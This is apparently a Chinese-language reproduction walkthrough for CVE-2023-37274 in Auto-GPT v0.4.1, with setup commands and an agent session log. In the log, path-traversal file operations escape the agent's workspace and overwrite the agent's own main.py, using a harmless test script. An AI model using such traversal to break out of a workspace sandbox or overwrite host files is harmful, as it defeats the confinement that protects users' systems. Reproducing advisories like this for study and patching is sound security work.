系統 - OpenAI - CVE-2023-37274



參考資訊:
https://nvd.nist.gov/vuln/detail/CVE-2023-37274
https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-5h38-mgp9-rj5f

步驟如下:

$ cd
$ vim test.py
    #!/usr/bin/python3
    print('this is cve test file !')

$ chmod a+x test.py

$ git clone https://github.com/Significant-Gravitas/AutoGPT --recursive
$ cd AutoGPT
$ cp .env.template .env
$ vim .env
    EXECUTE_LOCAL_COMMANDS=True

$ git checkout v0.4.1
$ ./run.py
    I want Auto-GPT to: asisting with copy a file from '../../../test.py' to local

    NEXT ACTION:  COMMAND = execute_shell ARGUMENTS = {'command_line': 'scp user@remote_host:../../../test.py /local/directory/'}
    Input:update command_line as 'cp ../../../test.py ./'

    NEXT ACTION:  COMMAND = execute_shell ARGUMENTS = {'command_line': 'cp ../../../test.py ./'}
    Input:y

    NEXT ACTION:  COMMAND = task_complete ARGUMENTS = {'reason': "The file 'test.py' has been successfully copied from the remote directory to the local system."}
    Input:execute test.py file

    NEXT ACTION:  COMMAND = execute_python_file ARGUMENTS = {'filename': '/home/steward/Downloads/AutoGPT/autogpt/auto_gpt_workspace/test.py'}
    Input:y

    -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-= 
    SYSTEM:  Command execute_python_file returned: this is cve test file !

$ ./run.py
    I want Auto-GPT to: asisting with copy a file from '../../../test.py' to ../../main.py

    NEXT ACTION:  COMMAND = execute_shell ARGUMENTS = {'command_line': 'cp ../../../test.py ../../main.py'}
    Input:y

    -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-=
    SYSTEM:  Command execute_shell returned: STDOUT: b'' STDERR: b''

    Input:print ../../main.py
    NEXT ACTION:  COMMAND = execute_shell ARGUMENTS = {'command_line': 'cat ../../main.py'}

    -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-=
    SYSTEM:  Command execute_shell returned: STDOUT: b"print('this is cve test file !')\n" STDERR: b''